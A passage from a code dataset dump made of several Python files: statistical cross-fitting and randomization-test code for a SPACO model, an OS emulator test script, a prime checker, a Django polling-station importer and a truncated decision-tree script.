cross_fit_obj.lambda1 = cross_fit_obj.lambda1[orders]\n return cross_fit_obj\n\n\nclass SPACOcross():\n def __init__(self, spaco_obj = None, nfolds = 5, train_ids= None, test_ids=None,\n lam1_update = False, lam2_update = False, trace = False, random_state = 0):\n self.nfolds = nfolds\n self.beta_folds = spaco_obj.beta_folds\n self.lam1_update = lam1_update\n self.lam2_update = lam2_update\n self.trace = trace\n self.X = spaco_obj.X\n self.O = spaco_obj.O\n self.Z = spaco_obj.Z\n self.Omega = spaco_obj.Omega.copy()\n self.num_subjects = spaco_obj.num_subjects\n self.num_times = spaco_obj.num_times\n self.num_features = spaco_obj.num_features\n self.K = spaco_obj.K\n self.h = spaco_obj.h\n self.homoNoise = spaco_obj.homoNoise\n self.Phi = spaco_obj.Phi.copy()\n self.V = spaco_obj.V.copy()\n self.sigma = spaco_obj.sigma.copy()\n self.mu = spaco_obj.mu.copy()\n self.cov = spaco_obj.cov.copy()\n ###calculate the nonstandaridized marginal correlation\n self.s2 = np.zeros((self.num_features * self.num_times))\n for j in np.arange(self.num_features):\n ll = np.arange(j * self.num_times,(j + 1) * self.num_times)\n self.s2[ll] = self.sigma[j]\n self.sigmaF = spaco_obj.sigmaF.copy()\n self.lambda1 = spaco_obj.lambda1.copy()\n self.lambda2 = spaco_obj.lambda2.copy()\n self.nlam1 = spaco_obj.nlam1\n self.nlam2 = spaco_obj.nlam2\n self.dfmin = spaco_obj.dfmin\n self.dfmax = spaco_obj.dfmax\n self.lam1criterion = spaco_obj.lam1criterion\n self.transform_mat = spaco_obj.transform_mat.copy()\n self.transform_vec = spaco_obj.transform_vec.copy()\n self.transform_mat_cross = spaco_obj.transform_mat.copy()\n self.transform_vec_cross = spaco_obj.transform_vec.copy()\n self.fit_intercept = spaco_obj.fit_intercept\n self.intercepts = spaco_obj.intercepts\n self.orthogonal = spaco_obj.orthogonal\n self.mu_cross = spaco_obj.mu.copy()\n self.cov_cross = spaco_obj.cov.copy()\n self.intermediantes = spaco_obj.intermediantes.copy()\n if train_ids is None or test_ids is None:\n k_fold = KFold(nfolds, shuffle=True, random_state=random_state)\n subject_ids = np.arange(self.num_subjects)\n split_id_obj = k_fold.split(subject_ids)\n train_ids = []\n test_ids = []\n for train_index, test_index in split_id_obj:\n train_ids.append(train_index.copy())\n test_ids.append(test_index.copy())\n self.train_ids = train_ids\n self.test_ids = test_ids\n self.crossV = np.zeros((spaco_obj.num_features, spaco_obj.K, nfolds))\n self.crossPhi = np.zeros((spaco_obj.num_times, spaco_obj.K, nfolds))\n self.crossSigmaF = np.zeros((spaco_obj.K, nfolds))\n if spaco_obj.Z is not None:\n self.crossBeta = np.zeros((spaco_obj.Z.shape[1], spaco_obj.K, nfolds))\n self.crossIntercept = np.zeros((spaco_obj.K, nfolds))\n self.beta = spaco_obj.beta.copy()\n self.intercepts = spaco_obj.intercepts.copy()\n else:\n self.crossBeta = None\n self.crossIntercept = None\n self.beta = None\n def crossfit(self, nfolds0=5, max_iter=10,max_iter0 = 5, tol=0.01):\n temp_vec = np.zeros((self.num_subjects, self.K))\n PhiV0 = np.zeros((self.num_times * self.num_features, self.K))\n # find the most correlated PhiV dimension and flip the sign\n for k in np.arange(self.K):\n PhiV0[:, k] = np.kron(self.V[:, k].reshape((self.num_features, 1)),\n self.Phi[:, k].reshape((self.num_times,1))).reshape(-1)\n for fold_id in np.arange(self.nfolds):\n if self.trace:\n print(\"######################\")\n print(\"fold\" + str(fold_id) + \":\")\n opts = {}\n opts['X'] = self.X[self.train_ids[fold_id], :, :];\n opts['O'] = self.O[self.train_ids[fold_id], :, :];\n opts['Omega'] = self.Omega\n opts['h'] = self.h\n if self.Z is not None:\n opts['Z'] = self.Z[self.train_ids[fold_id], :];\n else:\n opts['Z'] = None\n opts['K'] = self.K\n opts['Omega'] = self.Omega;\n opts['h'] = self.h;\n opts['intercept'] = self.fit_intercept\n opts['orthogonal'] = self.orthogonal\n opts['cov'] = self.cov[self.train_ids[fold_id], :,:].copy();\n opts['mu'] = self.mu[self.train_ids[fold_id],:].copy();\n opts['V'] = self.V.copy();\n opts['Phi'] = self.Phi.copy();\n opts['sigma'] = self.sigma.copy();\n opts['sigmaF'] = self.sigmaF.copy();\n opts['lam1_update'] = self.lam1_update\n opts['lam2_update'] = self.lam2_update\n opts['nlam1'] = self.nlam1\n opts['nlam2'] = self.nlam2\n if self.Z is not None:\n opts['beta'] = np.zeros(self.beta.shape)\n else:\n opts['beta'] = None\n if self.lambda2 is not None:\n opts['lambda2'] = self.lambda2.copy();\n else:\n opts['lambda2'] = None\n opts['beta_folds'] = self.beta_folds; opts['foldid'] = None\n opts['lambda1'] = self.lambda1;\n opts['dfmin'] = self.dfmin\n opts['dfmax'] = self.dfmax\n opts['extra_sd'] = self.lam1criterion\n opts['homoNoise'] = self.homoNoise\n tmp = SPACO(opts)\n tmp.check_init()\n tmp = SPACOfitSingle(self = tmp, max_iter = max_iter, tol = tol, max_iter0=max_iter0,\n nfolds0 = nfolds0, trace = self.trace,\n update_sigma = False, update_sigmaF =True, update_cov = True)\n PhiV =np.zeros((self.num_times*self.num_features, self.K))\n #find the most correlated PhiV dimension and flip the sign\n for k in np.arange(self.K):\n PhiV[:,k] = np.kron(tmp.V[:,k].reshape((self.num_features,1)),\n tmp.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n cor_mat = np.corrcoef(np.transpose(np.hstack([PhiV0, PhiV])))\n cor_mat = cor_mat[self.K:,:self.K]\n tmp = permutation_align_greedy(tmp, cor_mat)\n self.crossV[:, :, fold_id] = tmp.V.copy()\n self.crossPhi[:, :, fold_id] = tmp.Phi.copy()\n self.crossSigmaF[:,fold_id] = tmp.sigmaF.copy()\n if self.Z is not None:\n self.crossBeta[:, :, fold_id] = tmp.beta.copy()\n if self.fit_intercept is not None:\n self.crossIntercept[:,fold_id] = tmp.intercepts.copy()\n # correction\n xte = self.intermediantes['Xmod1'][self.test_ids[fold_id], :]\n ote = self.intermediantes['O1'][self.test_ids[fold_id], :]\n if self.Z is not None:\n zte = self.Z[self.test_ids[fold_id], :]\n else:\n zte = None\n PhiV =np.zeros((self.num_times*self.num_features, self.K))\n #find the most correlated PhiV dimension and flip the sign\n for k in np.arange(self.K):\n PhiV[:,k] = np.kron(tmp.V[:,k].reshape((self.num_features,1)),\n tmp.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n mu, cov, transform_vec, transform_mat, temp_vec0 = \\\n cross_posterior(xte = xte, ote = ote, zte = zte, s2 = self.s2, sigmaF = tmp.sigmaF,\n PhiV = PhiV, beta=tmp.beta, intercepts=tmp.intercepts,fit_intercept=tmp.fit_intercept)\n self.transform_vec_cross[self.test_ids[fold_id],:] = transform_vec.copy()\n self.transform_mat_cross[self.test_ids[fold_id],:,:] = transform_mat.copy()\n temp_vec[self.test_ids[fold_id],:] = temp_vec0.copy()\n self.mu_cross[self.test_ids[fold_id],:] = mu.copy()\n self.cov_cross[self.test_ids[fold_id],:,:] = cov.copy()\n if self.Z is not None:\n self.crossBeta[:, :, fold_id] = tmp.beta.copy()\n self.crossIntercept[:,fold_id] = tmp.intercepts.copy()\n #calculate posteriors for scaling\n if self.Z is not None:\n beta, intercepts, lambda2 = beta_fit(Z=self.Z,\n transform_mat=self.transform_mat_cross,\n transform_vec=self.transform_vec_cross,\n beta=self.beta,intercepts=self.intercepts,\n lambda2=self.lambda2, fit_intercept=self.fit_intercept,\n lam2_update=self.lam2_update, nlam2=self.nlam2,\n nfolds=nfolds0, max_iter=1, tol=tol)\n else:\n beta = None\n intercepts = np.zeros(self.K)\n self.beta = beta\n self.intercepts = intercepts\n added = np.zeros((self.num_subjects, self.K))\n if self.Z is not None:\n added = np.matmul(self.Z, self.beta)\n if self.fit_intercept:\n added = added + self.intercepts\n for fold_id in np.arange(self.nfolds):\n # correction\n sigmaF = self.crossSigmaF[:,fold_id]\n tmp1 = temp_vec[self.test_ids[fold_id],:]+added[self.test_ids[fold_id],:]/sigmaF\n mu = np.zeros((len(self.test_ids[fold_id]), self.K))\n for i in np.arange(len(self.test_ids[fold_id])):\n mu[i,:] = np.matmul(self.cov_cross[i,:,:], tmp1[i,:])\n self.mu_cross[self.test_ids[fold_id],:] = mu.copy()\n for k in np.arange(self.K):\n r1 = np.sqrt(np.sum(self.mu_cross[:,k] ** 2) / np.sum(self.mu[:,k]** 2))\n r2 = np.corrcoef(self.mu[:,k],self.mu_cross[:,k])[0,1]\n if r2 < 0:\n r2 = 0.0\n r = r1*r2\n if r < 1:\n self.mu[:, k] = self.mu[:, k] * r\n\n\ndef beta_fit_cleanup(Z, beta, intercepts, delta, prevec, cov, noiseCov,\n test_ids, sigmaF, lambda2, factor_idx = None,\n fit_intercept = True, max_iter = 1, tol = 0.01,\n lam2_update = True, nlam2 = 100, nfolds = 5, foldid= None,\n beta_fix = None, intercepts_fix = None, iffix = False):\n ##create y and z\n I = Z.shape[0]\n K = beta.shape[1]\n augZ = Z.copy()\n err = 2.0 * tol\n it = 0\n beta_prev = beta.copy()\n intercepts_prev = intercepts.copy()\n if factor_idx is None:\n factor_idx = np.arange(K)\n while it < max_iter and err > tol:\n if fit_intercept is True:\n augZ = np.hstack([Z, np.ones((Z.shape[0], 1), dtype=float)])\n for k in factor_idx:\n mu_trans = np.zeros(Z.shape[0])\n Z_trans = np.zeros(augZ.shape)\n if iffix is False:\n bb = np.delete(beta_prev, k, axis=1)\n else:\n bb = np.delete(beta_fix, k, axis=1)\n tmp0 = np.matmul(Z, bb)\n if fit_intercept:\n if iffix is False:\n tmp0 = tmp0 + np.delete(intercepts_prev, k)\n else:\n tmp0 = tmp0 + np.delete(intercepts_fix,k)\n for fold_id in np.arange(len(test_ids)):\n for i0 in np.arange(len(test_ids[fold_id])):\n i = test_ids[fold_id][i0]\n wik = 1.0/np.sqrt(noiseCov[i,k,k])\n mu_trans[i] = np.sum(cov[i,k,:]*prevec[i,:])\n for l in np.arange(K):\n if l != k:\n mu_trans[i] += delta * cov[i,k,l] * sigmaF[l,fold_id]\n mu_trans[i] = mu_trans[i] * wik\n Z_trans[i,:] = augZ[i,:] * (1.0 - delta * cov[i,k,k]/sigmaF[k,fold_id]) * wik\n penalty_factor = np.ones(Z_trans.shape[1])\n if fit_intercept:\n penalty_factor[Z_trans.shape[1] - 1] = 0.0\n if lam2_update:\n coefficients, lambda1min, cvm, cvsd, lambdas = my_cv_glmnet(x=Z_trans, y=mu_trans,\n penalty_factor=penalty_factor, nlam= nlam2, nfolds=nfolds, foldid = foldid)\n lambda2[k] = lambda1min\n else:\n coefficients = my_glmnet(x=Z_trans, y=mu_trans, lam=lambda2[k], nlam=100, penalty_factor=penalty_factor)\n p0 = len(coefficients)\n if fit_intercept:\n intercepts[k] = coefficients[p0 - 1]\n p0 = p0 - 1\n beta[:, k] = coefficients[:p0].copy()\n err = np.sum((beta - beta_prev)**2)\n it += 1\n beta_prev = beta.copy()\n intercepts_prev = intercepts.copy()\n return beta, intercepts, lambda2\n\n'''\nCRtest and CRtest_cross fix estiamted model parameters other than beta\nand compare the p-values using randomized (conditional) variables.\n'''\nclass CRtest_cross:\n def __init__(self, spaco_cross, type = 'cross', delta = 1.0):\n self.type = type\n self.K = spaco_cross.K\n self.delta = delta\n self.Z = spaco_cross.Z.copy()\n self.U = np.zeros((spaco_cross.num_subjects, spaco_cross.K))\n if self.type == 'cross':\n self.cov = spaco_cross.cov_cross.copy()\n self.sigmaF = spaco_cross.crossSigmaF.copy()\n self.transform_mat = spaco_cross.transform_mat_cross.copy()\n self.transform_vec = spaco_cross.transform_vec_cross.copy()\n self.transform_vec = spaco_cross.transform_vec_cross.copy()\n self.test_ids = spaco_cross.test_ids\n self.train_ids = spaco_cross.train_ids\n else:\n self.cov = spaco_cross.cov.copy()\n self.transform_mat = spaco_cross.transform_mat.copy()\n self.transform_vec = spaco_cross.transform_vec.copy()\n self.test_ids = [np.arange(self.Z.shape[0])]\n self.train_ids = [np.arange(self.Z.shape[0])]\n self.sigmaF = np.ones((self.K, 1))\n self.sigmaF[:,0] = spaco_cross.sigmaF.copy()\n self.beta = spaco_cross.beta.copy()\n self.beta_tmp = self.beta.copy()\n self.beta_drop = np.zeros((spaco_cross.beta.shape[0], spaco_cross.beta.shape[1], spaco_cross.beta.shape[0]))\n self.intercepts = spaco_cross.intercepts.copy()\n self.intercepts_tmp = spaco_cross.intercepts.copy()\n self.intercepts_drop = np.zeros((self.K, self.beta.shape[0]))\n self.lambda2 = spaco_cross.lambda2.copy()\n self.fit_intercept = spaco_cross.fit_intercept\n self.lam2_update = spaco_cross.lam2_update\n self.nlam2 = spaco_cross.nlam2\n self.Zuse = np.zeros((self.Z.shape[0], self.K))\n self.Ztheta = np.zeros((self.Z.shape[0], self.K, self.K))\n self.offsets = np.ones((self.Z.shape[0], self.K))\n self.coef_marginal = np.zeros((self.Z.shape[1], self.K))\n self.coef_partial = np.zeros((self.Z.shape[1], self.K))\n self.residuals = np.zeros((self.Z.shape[0], self.K))\n self.cov_delta = self.cov.copy()\n self.noiseCOV_delta = np.ones((self.Z.shape[0], self.K, self.K))\n self.noise_inv = np.ones((self.Z.shape[0], self.K, self.K))\n self.prevec = self.transform_vec.copy()\n self.transform_y = np.zeros((self.Z.shape[0], self.K))\n self.transform_residuals = np.zeros((self.Z.shape[0], self.K))\n self.theta = np.zeros((self.Z.shape[1],self.K))\n self.weights1 = np.zeros((self.Z.shape[0], self.K))\n self.weights2 = np.zeros((self.Z.shape[0], self.K))\n self.foldid = None\n def cut_folds(self, nfolds = 5, random_state = 1):\n k_fold = KFold(nfolds, shuffle=True, random_state=random_state)\n subject_ids = np.arange(self.Z.shape[0])\n split_id_obj = k_fold.split(subject_ids)\n train_ids = []\n test_ids = []\n for train_index, test_index in split_id_obj:\n train_ids.append(train_index.copy())\n test_ids.append(test_index.copy())\n self.foldid = np.zeros(self.Z.shape[0], dtype = int)\n for fold_id in np.arange(nfolds):\n self.foldid[test_ids[fold_id]] = fold_id + 1\n def precalculation0(self):\n #calculate prevec\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n tmp1 = np.linalg.inv(self.cov[i, :, :])\n self.prevec[i, :] = np.matmul(tmp1,self.transform_vec[i,:] * self.sigmaF[:,fold_id])\n def precalculation(self):\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n tmp1 = np.linalg.inv(self.cov[i, :, :])\n tmp2 = np.diag(1.0/self.sigmaF[:,fold_id])\n self.cov_delta[i, :, :] = np.linalg.inv(tmp1 - tmp2 + self.delta* tmp2)\n self.noiseCOV_delta[i,:,:] = np.diag(self.sigmaF[:,fold_id]) + (1.0 - 2*self.delta)*self.cov_delta[i,:,:]+\\\n (self.delta**2-self.delta) * np.matmul(self.cov_delta[i,:,:]/self.sigmaF[:,fold_id],self.cov_delta[i,:,:])\n self.noise_inv[i,:,:] = np.linalg.inv(self.noiseCOV_delta[i,:,:])\n def beta_fun_full(self, foldid = None, nfolds = 5, max_iter = 1, tol = 0.01, fixbeta0 = True):\n self.beta_tmp, intercepts_tmp, lambda2 = beta_fit_cleanup(Z = self.Z, beta = self.beta_tmp,\n intercepts = self.intercepts_tmp, delta =self.delta, prevec = self.prevec,\n cov = self.cov_delta, noiseCov = self.noiseCOV_delta, test_ids = self.test_ids,\n sigmaF = self.sigmaF, lambda2 = self.lambda2,factor_idx=None, lam2_update=self.lam2_update, nlam2= self.nlam2,\n nfolds = nfolds, foldid = self.foldid, fit_intercept = self.fit_intercept, max_iter =max_iter, tol =tol,\n beta_fix = self.beta, intercepts_fix = self.intercepts, iffix =fixbeta0)\n def beta_fun_one(self, nfolds, j = 0, max_iter = 1, tol = 0.01, fixbeta0 = True):\n idx = np.arange(self.Z.shape[1])\n idx = np.delete(idx, j)\n Z1 = np.delete(self.Z, j, axis = 1)\n if fixbeta0:\n beta1 = np.delete(self.beta, j, axis=0).copy()\n intercepts = self.intercepts.copy()\n else:\n beta1 = np.delete(self.beta_tmp, j,axis=0).copy()\n intercepts = self.intercepts_tmp.copy()\n for k in np.arange(self.K):\n if self.beta_tmp[j, k] == 0:\n self.beta_drop[:, k, j] = self.beta_tmp[:,k].copy()\n self.intercepts_drop[k, j] = self.intercepts_tmp[k].copy()\n else:\n beta1, intercepts, lambda2 =beta_fit_cleanup(Z = Z1, beta = beta1,\n intercepts = intercepts, delta = self.delta, prevec = self.prevec,\n cov = self.cov_delta, noiseCov = self.noiseCOV_delta, test_ids = self.test_ids,\n sigmaF = self.sigmaF, lambda2 = self.lambda2, factor_idx = [k],lam2_update=self.lam2_update, nlam2= self.nlam2,\n nfolds = nfolds, foldid =self.foldid, fit_intercept = self.fit_intercept, max_iter = max_iter,tol=tol,\n beta_fix = beta1, intercepts_fix = intercepts, iffix =True)\n self.beta_drop[idx, k, j] = beta1[:,k].copy()\n self.intercepts_drop[k,j] = intercepts[k].copy()\n def precalculation_response(self, j = 0):\n ###precalculate ``response\" used for calculating marginal or partial correlation\n fitted =np.matmul(self.Z,self.beta_drop[:,:,j])\n for k in np.arange(self.K):\n fitted[:,k] = fitted[:,k]+self.intercepts_drop[k,j]\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n self.transform_y[i,:] = np.matmul(self.cov_delta[i,:,:], self.prevec[i,:])\n for k in np.arange(self.K):\n for l in np.arange(self.K):\n if l != k:\n self.transform_y[i, k] = self.transform_y[i,k] + self.delta * self.cov[i,k,l] * fitted[i,l] /self.sigmaF[l,fold_id]\n self.residuals[i, k] = self.transform_y[i, k] - (1.0 - self.cov[i,k,k]/self.sigmaF[k,fold_id]) * fitted[i,k]\n self.weights1[i,k] = 1.0/self.noiseCOV_delta[i,k,k]\n self.weights2[i,k] = 1.0 - self.delta * self.cov_delta[i,k,k]/self.sigmaF[k,fold_id]\n #def Ztheta_prepare(self):\n def Ztheta_calculate(self, j = 0):\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n self.Ztheta[i,:,:] = self.Z[i,j] * (np.identity(self.K) - self.delta * self.cov_delta[i,:,:]/self.sigmaF[:,fold_id])\n def coef_partial_fun(self,j, joint = False):\n if joint:\n #scale the response and the covariate\n A = np.zeros((self.K, self.K))\n a = np.zeros((self.K))\n for i in np.arange(self.Z.shape[0]):\n tmp = np.matmul(np.transpose(self.Ztheta[i,:,:]),self.noise_inv[i,:,:])\n A += np.matmul(tmp,self.Ztheta[i,:,:])\n a += np.matmul(tmp, self.residuals[i,:])\n self.coef_partial[j,:] = np.matmul(np.linalg.inv(A),a)\n else:\n for k in np.arange(self.K):\n self.coef_partial[j,k] = np.sum(self.residuals[:,k] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k])/np.sum(self.Z[:,j] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k]**2)\n def coef_marginal_fun(self,j,joint = False):\n if joint:\n #scale the response and the covariate\n A = np.zeros((self.K, self.K))\n a = np.zeros((self.K))\n for i in np.arange(self.Z.shape[0]):\n tmp = np.matmul(np.transpose(self.Ztheta[i,:,:]),self.noise_inv[i,:,:])\n A += np.matmul(tmp,self.Ztheta[i,:,:])\n a += np.matmul(tmp, self.transform_y[i,:])\n self.coef_marginal[j,:] = np.matmul(np.linalg.inv(A),a)\n else:\n for k in np.arange(self.K):\n self.coef_marginal[j,k] = np.sum(self.transform_y[:,k] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k])/np.sum(self.Z[:,j] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k]**2)\n\n\ndef pvalue_fit(z, nulls, dist_name):\n dist = getattr(scipy.stats, dist_name)\n mu = np.mean(nulls)\n s = np.std(nulls)\n t_null = (nulls - mu) / s\n t0 = np.abs((z - mu) / s)\n params = dist.fit(t_null)\n arg = params[:-2]\n loc = params[-2]\n scale = params[-1]\n pval = dist.cdf(-t0, *arg, loc=loc, scale=scale)+1.0 - dist.cdf(t0, *arg, loc=loc, scale=scale)\n return pval\n\n\n'''\n@spaco: a spaco/spaco_cross object\n@Zconditional: randomly generated N * q * B array for conditional randomization test. None = skip.\n@Zmarginal: randomly generated N * q * B array for conditional randomization test. None = skip.\n@dist_name: distribution used for fitting the nulls.\n@method: if spaco is from cross-fitting.\n@trace: if print out the progress.\n'''\ndef CRtest_pvals(spaco, Zconditional = None, Zmarginal = None,\n nfolds = 5, dist_name = 'nct',\n method = 'cross', trace = False, random_state=0):\n I = spaco.Z.shape[0]; q = spaco.Z.shape[1]\n if method != 'cross':\n method = 'spaco'\n if Zconditional is not None:\n B1 = Zconditional.shape[2]\n else:\n B1 = None\n if Zmarginal is not None:\n B2 = Zmarginal.shape[2]\n else:\n B2 = None\n if Zconditional is None and Zmarginal is None:\n print('No randomized variables are provided.')\n return\n delta = 0; tol = 0.01; fixbeta0 = False;\n feature_eval = CRtest_cross(spaco, type = method, delta = delta)\n feature_eval.precalculation0()\n feature_eval.precalculation()\n feature_eval.beta_tmp = np.zeros(feature_eval.beta_tmp.shape)\n feature_eval.cut_folds(nfolds=nfolds, random_state=random_state)\n feature_eval.beta_fun_full(nfolds=nfolds, max_iter=1, tol= tol, fixbeta0=fixbeta0)\n # estimate the leave-one-feature out coefficients\n for j in np.arange(feature_eval.Z.shape[1]):\n if trace:\n print(j)\n feature_eval.beta_fun_one(nfolds=nfolds, j=j,max_iter=1,fixbeta0=fixbeta0)\n #calculate the test statistics for conditional and mariginal independence\n for j in np.arange(feature_eval.Z.shape[1]):\n feature_eval.precalculation_response(j=j)\n feature_eval.coef_partial_fun(j = j, joint=False)\n feature_eval.coef_marginal_fun(j = j, joint=False)\n #calculate the randomized test statistics\n ###null distributions\n if B1 is not None:\n coef_random_marginal = np.zeros((spaco.Z.shape[1], spaco.K, B1))\n if B2 is not None:\n coef_random_partial = np.zeros((spaco.Z.shape[1], spaco.K, B2))\n feature_eval_random = copy.deepcopy(feature_eval)\n for j in np.arange(feature_eval.Z.shape[1]):\n print(j)\n feature_eval_random.Z = feature_eval.Z.copy()\n feature_eval_random.precalculation_response(j=j)\n if B1 is not None:\n for b in np.arange(B1):\n feature_eval_random.Z[:, j] = Zconditional[:, j,b].copy()\n feature_eval_random.coef_partial_fun(j=j, joint=False)\n coef_random_partial[j, :,b] = feature_eval_random.coef_partial[j,:].copy()\n if B2 is not None:\n for b in np.arange(B2):\n feature_eval_random.Z[:, j] = Zmarginal[:, j,b].copy()\n feature_eval_random.coef_marginal_fun(j=j,joint=False)\n coef_random_marginal[j, :,b] = feature_eval_random.coef_marginal[j,:].copy()\n if B1 is not None:\n pvals_fitted_partial = np.zeros((feature_eval.Z.shape[1], spaco.K))\n pvals_empirical_partial = np.zeros((feature_eval.Z.shape[1], spaco.K))\n else:\n pvals_fitted_partial = None\n pvals_empirical_partial = None\n if B2 is not None:\n pvals_fitted_marginal = np.zeros((feature_eval.Z.shape[1], spaco.K))\n pvals_empirical_marginal = np.zeros((feature_eval.Z.shape[1], spaco.K))\n else:\n pvals_empirical_marginal = None\n pvals_fitted_marginal = None\n for j in np.arange(pvals_fitted_marginal.shape[0]):\n if trace:\n print(j)\n for k in np.arange(pvals_fitted_marginal.shape[1]):\n if B1 is not None:\n nulls = coef_random_partial[j, k, :]\n #remove infinite values\n idx = np.where(~np.isnan(nulls))[0]\n pvals_empirical_partial[j,k] = (np.sum(np.abs(nulls[idx])>=np.abs(feature_eval.coef_partial[j,k]))+1)/(len(idx)+1)\n pvals_fitted_partial[j, k] = pvalue_fit(z=feature_eval.coef_partial[j, k],nulls=nulls[idx], dist_name=dist_name)\n if B2 is not None:\n nulls = coef_random_marginal[j, k, :]\n # check if zeros variance\n idx = np.where(~np.isnan(nulls))[0]\n pvals_empirical_marginal[j,k] = (np.sum(np.abs(nulls[idx])>=np.abs(feature_eval.coef_marginal[j,k]))+1)/(len(idx)+1)\n pvals_fitted_marginal[j,k] = pvalue_fit(z = feature_eval.coef_marginal[j,k], nulls = nulls[idx], dist_name = dist_name)\n return pvals_fitted_partial, pvals_fitted_marginal, pvals_empirical_partial, pvals_empirical_marginal\n","sub_path":"spaco/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":66879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"418657489","text":"from hardware import *\nfrom so import *\nimport log\nfrom shell import *\nfrom time import sleep\nimport sys\n\n\n##\n## MAIN \n##\nif __name__ == '__main__':\n log.setupLogger()\n log.logger.info('Starting emulator')\n\n ## setup our hardware and set memory size to 32 \"cells\"\n HARDWARE.setup(32)\n\n SCHEDULER_FCFS = 'FCFS'\n SCHEDULER_RR = 'RR'\n SCHEDULER_NP = 'NP'\n SCHEDULER_P = 'P'\n\n #scheduler choose\n sche = SCHEDULER_FCFS #<<<<<<< choose here or at cli\n\n if len(sys.argv) > 1:\n sche = sys.argv[1]\n\n if sche == SCHEDULER_RR:\n timer = HARDWARE.timer\n timer.quantum = 2\n scheduler = SchedulerRRB()\n if sche == SCHEDULER_FCFS:\n scheduler = SchedulerFCFS()\n if sche == SCHEDULER_NP:\n scheduler = SchedulerNonPreemtive()\n if sche == SCHEDULER_P:\n scheduler = SchedulerPreemtive()\n\n print(\"Runnnig\", scheduler.name)\n\n\n ## Switch on computer\n HARDWARE.switchOn()\n\n ## new create the Operative System Kernel\n # \"booteamos\" el sistema operativo\n kernel = Kernel(HARDWARE,scheduler, frameSize = 8)\n # sleep(1)\n\n # Ahora vamos a intentar ejecutar 3 programas a la vez\n ##################\n \"\"\"\n prg1 = Program([\n ASM.HEADER(10),\n ASM.CPU(1), #0\n ASM.CPU(1), #1\n ASM.CPU(1), #2\n ASM.AI1(1), #3\n ASM.PUSHA(), #4\n ASM.PUSHA(), #4\n ASM.AI1(1), #5\n ASM.JZ(4), #16\n ASM.CPU(1), #8\n ASM.JMP(17),\n ASM.CPU(2) #9 ,10\n ])\n \"\"\"\n prg1 = Program([\n ASM.HEADER(4),\n ASM.AI1(4),\n ASM.BI1(1),\n ASM.AD1(1),\n ASM.JZ(2),\n ASM.JMP(8),\n ASM.EXIT(1)\n ])\n kernel.fileSystem.write(\"asmcode\", prg1)\n kernel.run(\"asmcode\",1)\n kernel.run(\"asmcode\",1)\n\n shell.com(kernel)\n","sub_path":"entregas/practica_6/testcpu.py","file_name":"testcpu.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"418416960","text":"def prime(x):\n\ti=2\n\tif x < 2 or isinstance (x,float):# checks for float or negative\n\t\treturn False\n\telif x == 2 or x == 3: # return prime if x is 2 or 3\n\t\treturn True\n\telse:\n\t\twhile i <= x: #checks primarity for other numbers\n\t\t\tif x%i == 0:\n\t\t\t\treturn False\n\t\t\t\tbreak\n\t\t\ti = i+1\n\t\telse:\n\t\t\treturn True\n\n\n","sub_path":"pr.py","file_name":"pr.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"321905032","text":"\"\"\"\nImport East Riding\n\"\"\"\nfrom django.contrib.gis.geos import Point\n\nfrom data_collection.management.commands import BaseShpImporter\n\nclass Command(BaseShpImporter):\n \"\"\"\n Imports the Polling Station data from East Riding of Yorkshire Council\n \"\"\"\n council_id = 'E06000011'\n districts_name = 'Polling_Districts.shpn'\n stations_name = 'FOI6287_polling-stations.csv'\n\n def district_record_to_dict(self, record):\n return {\n 'internal_council_id': record[1],\n 'name': record[2],\n }\n\n def station_record_to_dict(self, record):\n\n try:\n location = Point(int(record.easting), int(record.northing), srid=self.srid)\n except ValueError:\n location = Point(float(record.easting), float(record.northing), srid=self.srid)\n addr = [record.name_of_station]\n addr += record.address.split(',')[:-1]\n return {\n 'internal_council_id': record.code,\n 'postcode' : record.address.split(',')[-1],\n 'address' : \"\\n\".join(addr),\n 'location' : location\n }\n \n","sub_path":"polling_stations/apps/data_collection/management/commands/import_east_riding.py","file_name":"import_east_riding.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"631383393","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 9 02:52:09 2019\r\n\r\n@author: spand\r\n\"\"\"\r\n\r\n\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('ABK2.3change.csv')\r\nX = dataset.iloc[:, 4:13].values\r\ny = dataset.iloc[:, 13].values\r\n\r\n\"\"\"from sklearn.preprocessing import Imputer\r\nimputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)\r\nimputer = imputer.fit(X[:,1: 16])\r\nX[:,1: 16] = imputer.transform(X[:,1: 16])\"\"\"\r\n\r\n \r\n\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state = 0)\r\n\r\n# Fitting Decision Tree Classification to the Training set\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nclassifier = DecisionTreeClassifier(criterion = 'entropy', random_state = 0)\r\nclassifier.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\n\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = 